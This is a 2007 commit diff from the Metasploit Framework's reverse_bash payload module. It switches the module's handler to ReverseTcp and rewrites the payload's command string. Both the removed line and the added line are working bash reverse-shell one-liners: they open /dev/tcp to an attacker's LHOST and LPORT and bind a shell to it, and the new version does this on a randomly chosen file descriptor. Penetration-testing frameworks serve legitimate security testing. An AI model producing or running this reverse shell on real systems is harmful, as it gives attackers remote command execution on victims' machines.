This patch fixes #4. Pick a random file descriptor and make sure its closed before we use it

git-svn-id: file:///home/svn/framework3/trunk@4407 4d416f70-5f16-0410-b530-b9f4589650da
2007-02-17 23:41:22 +00:00 · 2007-02-17 23:41:22 +00:00 · ce01a25e0c
parent 255d1ca4ce
commit ce01a25e0c
1 changed files with 4 additions and 3 deletions
--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@ -1,5 +1,5 @@
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp_double'
+require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'

 module Msf
@ -21,7 +21,7 @@ module ReverseBash
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
-			'Handler'       => Msf::Handler::ReverseTcpDouble,
+			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd_bash',
 			'Payload'       =>
@ -43,7 +43,8 @@ module ReverseBash
 	# Returns the command string to use for execution
 	#
 	def command_string
-		return "exec 13<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&13 >&13";
+		fd = rand(200) + 20
+		return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
 	end

 end